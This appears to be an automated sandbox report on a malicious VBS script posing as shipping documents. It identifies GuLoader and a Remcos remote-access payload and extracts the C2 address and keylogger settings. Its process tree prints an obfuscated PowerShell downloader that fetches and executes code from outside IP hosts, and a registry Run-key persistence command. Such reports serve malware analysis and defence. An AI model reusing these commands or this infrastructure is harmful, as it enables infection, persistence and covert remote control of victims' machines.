Analysis

  • max time kernel
    117s
  • max time network
    121s
  • platform
    windows7_x64
  • resource
    win7-20240221-en
  • resource tags

    arch:x64 arch:x86 image:win7-20240221-en locale:en-us os:windows7-x64 system
  • submitted
    25/03/2024, 13:15

General

  • Target

    awb_shipping_documents_25_03_2024_000000000.vbs

  • Size

    237KB

  • MD5

    937285e67679dcbd6d3a218cff5723e4

  • SHA1

    73023fa293fc84f1db845a75a4be3c2337c8da4d

  • SHA256

    d90f3ab705edef2a59cc39b6269f1a149f0f6e43e0aa4f128d05c1697726bcdb

  • SHA512

    607ea5c0cf19a5776d60c15942c28b5e9433e52f72abad0b250d7abb72f98721210d328c6915051cd9b2fa215a938ed64eebb20de3dc6b9511f2a2fa3cb1b773

  • SSDEEP

    6144:lyhQMLtOBxJrv5lttSP4KuK8jWwoipSRUiGT9rS2fTicm7jImE9uAI:ekVBDjI

Malware Config

Extracted

Family

remcos

Botnet

Latest

C2

85.209.176.69:57484

Attributes
  • audio_folder

    MicRecords

  • audio_record_time

    5

  • connect_delay

    0

  • connect_interval

    1

  • copy_file

    remcos.exe

  • copy_folder

    Remcos

  • delete_file

    false

  • hide_file

    false

  • hide_keylog_file

    true

  • install_flag

    false

  • keylog_crypt

    false

  • keylog_file

    pavnspt.dat

  • keylog_flag

    false

  • keylog_path

    %AppData%

  • mouse_option

    false

  • mutex

    lakosegtst-I6VUY0

  • screenshot_crypt

    false

  • screenshot_flag

    false

  • screenshot_folder

    Screenshots

  • screenshot_path

    %AppData%

  • screenshot_time

    10

  • startup_value

    

  • take_screenshot_option

    false

  • take_screenshot_time

    5

Signatures

  • Guloader,Cloudeye

    A shellcode based downloader first seen in 2020.

  • Remcos

    Remcos is a closed-source remote control and surveillance software.

  • Blocklisted process makes network request 1 IoCs
  • Adds Run key to start application 2 TTPs 1 IoCs
  • Suspicious use of NtCreateThreadExHideFromDebugger 2 IoCs
  • Suspicious use of NtSetInformationThreadHideFromDebugger 2 IoCs
  • Suspicious use of SetThreadContext 1 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Modifies registry key 1 TTPs 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 3 IoCs
  • Suspicious behavior: MapViewOfSection 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 2 IoCs
  • Suspicious use of WriteProcessMemory 28 IoCs

Processes

  • C:\Windows\System32\WScript.exe
    "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\awb_shipping_documents_25_03_2024_000000000.vbs"
    1⤵
    • Blocklisted process makes network request
    • Suspicious use of WriteProcessMemory
    PID:1736
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "<#Patchy Corporis Vergaloo #>;<#sndagsskolers Paws Alexandrite Skit #>;New-Item -Path 'reservats:\Forfaldt' -Name 'Tiptipoldemoders' -ItemType 'file';<#Conto Perty Rkefjolss blencorn Vitrinernes #>;Function Tulipa ([String]$superofficiously){$Urikonografi = 2;For($Uri=1; $Uri -lt $superofficiously.Length-1; $Uri+=$Urikonografi){ $Urstrukturens = $superofficiously.Substring($Uri, $Forkhead); $Distingverende80=$Distingverende80+$Urstrukturens; }$Distingverende80;}$Forkhead = (cmd /c 'echo 1 && exit');if (Test-Path 'reservats:\Forfaldt\Tiptipoldemoders') {$Forkhead--};$Agillawood224=Tulipa ' i,eRxE ';$Outfound=Tulipa '.TSr a n,s fVeSr,rDi,nDg, ';$Monochordist = Tulipa 'A\Ss yDs wUoJw 6S4H\FW i.n,dHoFw,s PBo,wFePrPSFh,eTl l \Gv 1,. 0K\SpdoAwse,r.sKhue l.lB. e xVe. ';function Forefather ($Firetages){. ($Agillawood224) ($Firetages);}$Strangler=Tulipa '.hPtPtApR: /./V1 4.7D.r7P8.. 1 0h3U.A2 5 0R/ S pUr r eUr eNg e lo. pRsPdB>shGtStOp.: /P/I8.5,.F2 0r9 . 1S7,6M.O4.6,/GSTpCr.r e rSe g,eSl .Sp s.dS ';$Formbrndselsfabrikken236=$Strangler.split([char]62);$Strangler=$Formbrndselsfabrikken236[0];Forefather (Tulipa ' $CgPlSo.bDaBld:BF y sHi,oJt eSrBaGp,eSu.tEsDk oWlRe r =K$AeRnUv.: wTiUntdFiEr ') ;Forefather (Tulipa ' $ g l.opbTa l.:BL,eHvHiSnRe r = $ F yAsHi oRtne rSa,pLeFuPt s kUoMl eFr.+ $AM o n,o cDh,o r dLi s tN ') ;Forefather (Tulipa 'T$ gUlNo b afl :RHPaSa nAd.vArSkNe tEs .=A ,( (Kg wAm iS w iDnU3 2,_,p r.o.c eMs s. -,F. P,rSoZcNeGs s I d =D$,{PP IKD,} )A. C o m m aHn d.L,i n e.). .- s,p lMi t. 
b[.cPh aJr ] 3B4E ');Forefather (Tulipa ' $ g.lFoCb.a,lg: R dUtA1I8.5D .=, T$AH.aSa n d v r.k e t s [ $ H,aOaSn dLvGrBkEeTt s .FcBo,u.nEtV-M2S] ');Forefather (Tulipa 'A$tgPlRo b,a.l.: OHvhe.rVb eAf oAl k nMiSnSg.eSn,s = (,TOe s t - P,aTt hB .$ L.eVvUifnBe rM) F- AAn dT T(.[ I nst PDtAr ] :P: sKiKzOe M- eEqF 8E) ') ;if ($Overbefolkningens) {& $Leviner $Rdt185;} else {;$Genealogists=Tulipa 'A$ g,l,oTbNa l : M.iGn,i,f iseTdJ ,= ,SAt.a r tS-PB iLtAseTarSa nRs f eNr. -NSToFu r,c e, G$ISOt r a n g,lUe r. -DDSeBs t iknSa tvi.oLn, O$ FEyMs i o t.e,rRaep.eOuPtSs.k,o.l.e.rB ';Forefather (Tulipa '.$Ag lVo b.aTlM: FLySsfiToIt e,rMaFp,eSu.tOsBkRoklbeMr = $,eonKv :Sa pCp d aSt aE ') ;Forefather (Tulipa '.I mMpOowrOtT-.M o dTuAl.e, BEiStEs,T rMa n s f e.rG ') ;$Fysioterapeutskoler=$Fysioterapeutskoler+'\Judicial.Ara' ;Forefather (Tulipa ',$,g l.o b,a lA:ICThDoUl eSlTiItAh.odt.o.m yn= (ST,e sEtN-,P.aGt hS ,$VF,ySsUi,oRt,eAr a.pVeSuNtesTkBo,l e r ), ') ;while (-not $Cholelithotomy) {Forefather (Tulipa ' IAf ( $TM i.n.i fPi eBdK.DJ opbAS.t.aDt ei -Re qH ,$.OWu tNf o u,n d.)F K{YS.tPa,r.tc- SClDeBeVp M1C} etlAs.eN{SSOt a,r tf-NS l eFe pB 1S;TFSoSrBe f aPt h,e.rP ,$.GBeEn.e a lKo g i sot sA}D ');Forefather (Tulipa 'F$Eg.lHokb.a lP:aC hHo,l eMl iVtKhSo tSoRm y = (,T,e s t.-.P aNt,hM K$ FNy,s i ovt eTr.a.pCe u t s k oBlKe r )S ') ;$Strangler=$Formbrndselsfabrikken236[$Precompiler++%$Formbrndselsfabrikken236.count];}Forefather (Tulipa '.$Ggal o,bSaOlA:UP aDsFs.a gHe.r eCrPnRe.sN t=D TGNeAtT-BC o nutUeQn.tD D$,FAy,s iSo.t,e r alpFeRuEtSs.k oIl,eNr ');Forefather (Tulipa 'K$Hg lDo.bBaPlN:DD.uGr o mOeLtHe,rRs = [.S yVsStPe m,. C,o nBv e rDt.]D:R: F ruo,m BPaKs e,6O4DSPtLrSiNnFg (J$ P aGsTs a.gteUr eBr.n e s,) ');Forefather (Tulipa 'I$,g lWo bBaOl.:,V.aSlCm.u.eB S=f S[.SRyFs t eUmB.,TSe x tK. 
E nFcuo,d iHnKg ].:P:UAPSTC.IVIS.,G.eSt.SFtTr i,n.g (.$ DHu,r.o.m eHtReDrKs )H ');Forefather (Tulipa ' $ g l.o,bPaAl,:SCueNp.h a.l o,cHhCoSr dEaS=A$,V a.lEm,uSe,.Ps,u b,s tUrHiFnKg (.2E9R1I1M8L6S, 2 3K4S0E0C)S ');Forefather $Cephalochorda;};;"
      2⤵
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:2404
      • C:\Windows\system32\cmd.exe
        "C:\Windows\system32\cmd.exe" /c "echo 1 && exit"
        3⤵
          PID:2672
        • C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe
          "C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "<#Patchy Corporis Vergaloo #>;<#sndagsskolers Paws Alexandrite Skit #>;New-Item -Path 'reservats:\Forfaldt' -Name 'Tiptipoldemoders' -ItemType 'file';<#Conto Perty Rkefjolss blencorn Vitrinernes #>;Function Tulipa ([String]$superofficiously){$Urikonografi = 2;For($Uri=1; $Uri -lt $superofficiously.Length-1; $Uri+=$Urikonografi){ $Urstrukturens = $superofficiously.Substring($Uri, $Forkhead); $Distingverende80=$Distingverende80+$Urstrukturens; }$Distingverende80;}$Forkhead = (cmd /c 'echo 1 && exit');if (Test-Path 'reservats:\Forfaldt\Tiptipoldemoders') {$Forkhead--};$Agillawood224=Tulipa ' i,eRxE ';$Outfound=Tulipa '.TSr a n,s fVeSr,rDi,nDg, ';$Monochordist = Tulipa 'A\Ss yDs wUoJw 6S4H\FW i.n,dHoFw,s PBo,wFePrPSFh,eTl l \Gv 1,. 0K\SpdoAwse,r.sKhue l.lB. e xVe. ';function Forefather ($Firetages){. ($Agillawood224) ($Firetages);}$Strangler=Tulipa '.hPtPtApR: /./V1 4.7D.r7P8.. 1 0h3U.A2 5 0R/ S pUr r eUr eNg e lo. pRsPdB>shGtStOp.: /P/I8.5,.F2 0r9 . 1S7,6M.O4.6,/GSTpCr.r e rSe g,eSl .Sp s.dS ';$Formbrndselsfabrikken236=$Strangler.split([char]62);$Strangler=$Formbrndselsfabrikken236[0];Forefather (Tulipa ' $CgPlSo.bDaBld:BF y sHi,oJt eSrBaGp,eSu.tEsDk oWlRe r =K$AeRnUv.: wTiUntdFiEr ') ;Forefather (Tulipa ' $ g l.opbTa l.:BL,eHvHiSnRe r = $ F yAsHi oRtne rSa,pLeFuPt s kUoMl eFr.+ $AM o n,o cDh,o r dLi s tN ') ;Forefather (Tulipa 'T$ gUlNo b afl :RHPaSa nAd.vArSkNe tEs .=A ,( (Kg wAm iS w iDnU3 2,_,p r.o.c eMs s. -,F. P,rSoZcNeGs s I d =D$,{PP IKD,} )A. C o m m aHn d.L,i n e.). .- s,p lMi t. 
b[.cPh aJr ] 3B4E ');Forefather (Tulipa ' $ g.lFoCb.a,lg: R dUtA1I8.5D .=, T$AH.aSa n d v r.k e t s [ $ H,aOaSn dLvGrBkEeTt s .FcBo,u.nEtV-M2S] ');Forefather (Tulipa 'A$tgPlRo b,a.l.: OHvhe.rVb eAf oAl k nMiSnSg.eSn,s = (,TOe s t - P,aTt hB .$ L.eVvUifnBe rM) F- AAn dT T(.[ I nst PDtAr ] :P: sKiKzOe M- eEqF 8E) ') ;if ($Overbefolkningens) {& $Leviner $Rdt185;} else {;$Genealogists=Tulipa 'A$ g,l,oTbNa l : M.iGn,i,f iseTdJ ,= ,SAt.a r tS-PB iLtAseTarSa nRs f eNr. -NSToFu r,c e, G$ISOt r a n g,lUe r. -DDSeBs t iknSa tvi.oLn, O$ FEyMs i o t.e,rRaep.eOuPtSs.k,o.l.e.rB ';Forefather (Tulipa '.$Ag lVo b.aTlM: FLySsfiToIt e,rMaFp,eSu.tOsBkRoklbeMr = $,eonKv :Sa pCp d aSt aE ') ;Forefather (Tulipa '.I mMpOowrOtT-.M o dTuAl.e, BEiStEs,T rMa n s f e.rG ') ;$Fysioterapeutskoler=$Fysioterapeutskoler+'\Judicial.Ara' ;Forefather (Tulipa ',$,g l.o b,a lA:ICThDoUl eSlTiItAh.odt.o.m yn= (ST,e sEtN-,P.aGt hS ,$VF,ySsUi,oRt,eAr a.pVeSuNtesTkBo,l e r ), ') ;while (-not $Cholelithotomy) {Forefather (Tulipa ' IAf ( $TM i.n.i fPi eBdK.DJ opbAS.t.aDt ei -Re qH ,$.OWu tNf o u,n d.)F K{YS.tPa,r.tc- SClDeBeVp M1C} etlAs.eN{SSOt a,r tf-NS l eFe pB 1S;TFSoSrBe f aPt h,e.rP ,$.GBeEn.e a lKo g i sot sA}D ');Forefather (Tulipa 'F$Eg.lHokb.a lP:aC hHo,l eMl iVtKhSo tSoRm y = (,T,e s t.-.P aNt,hM K$ FNy,s i ovt eTr.a.pCe u t s k oBlKe r )S ') ;$Strangler=$Formbrndselsfabrikken236[$Precompiler++%$Formbrndselsfabrikken236.count];}Forefather (Tulipa '.$Ggal o,bSaOlA:UP aDsFs.a gHe.r eCrPnRe.sN t=D TGNeAtT-BC o nutUeQn.tD D$,FAy,s iSo.t,e r alpFeRuEtSs.k oIl,eNr ');Forefather (Tulipa 'K$Hg lDo.bBaPlN:DD.uGr o mOeLtHe,rRs = [.S yVsStPe m,. C,o nBv e rDt.]D:R: F ruo,m BPaKs e,6O4DSPtLrSiNnFg (J$ P aGsTs a.gteUr eBr.n e s,) ');Forefather (Tulipa 'I$,g lWo bBaOl.:,V.aSlCm.u.eB S=f S[.SRyFs t eUmB.,TSe x tK. 
E nFcuo,d iHnKg ].:P:UAPSTC.IVIS.,G.eSt.SFtTr i,n.g (.$ DHu,r.o.m eHtReDrKs )H ');Forefather (Tulipa ' $ g l.o,bPaAl,:SCueNp.h a.l o,cHhCoSr dEaS=A$,V a.lEm,uSe,.Ps,u b,s tUrHiFnKg (.2E9R1I1M8L6S, 2 3K4S0E0C)S ');Forefather $Cephalochorda;};;"
          3⤵
          • Suspicious use of NtSetInformationThreadHideFromDebugger
          • Suspicious use of SetThreadContext
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious behavior: MapViewOfSection
          • Suspicious use of AdjustPrivilegeToken
          • Suspicious use of WriteProcessMemory
          PID:2652
          • C:\Windows\SysWOW64\cmd.exe
            "C:\Windows\system32\cmd.exe" /c "echo 1 && exit"
            4⤵
              PID:1204
            • C:\Program Files (x86)\windows mail\wab.exe
              "C:\Program Files (x86)\windows mail\wab.exe"
              4⤵
              • Suspicious use of NtCreateThreadExHideFromDebugger
              • Suspicious use of NtSetInformationThreadHideFromDebugger
              • Suspicious use of WriteProcessMemory
              PID:1344
              • C:\Windows\SysWOW64\cmd.exe
                "C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Epizoa213" /t REG_EXPAND_SZ /d "%Overborgmesteren% -w 1 $Skrubbenes31=(Get-ItemProperty -Path 'HKCU:\antimakassar\').Nissehue183;%Overborgmesteren% ($Skrubbenes31)"
                5⤵
                • Suspicious use of WriteProcessMemory
                PID:2796
                • C:\Windows\SysWOW64\reg.exe
                  REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Epizoa213" /t REG_EXPAND_SZ /d "%Overborgmesteren% -w 1 $Skrubbenes31=(Get-ItemProperty -Path 'HKCU:\antimakassar\').Nissehue183;%Overborgmesteren% ($Skrubbenes31)"
                  6⤵
                  • Adds Run key to start application
                  • Modifies registry key
                  PID:2648

      Network

            MITRE ATT&CK Enterprise v15

            Downloads
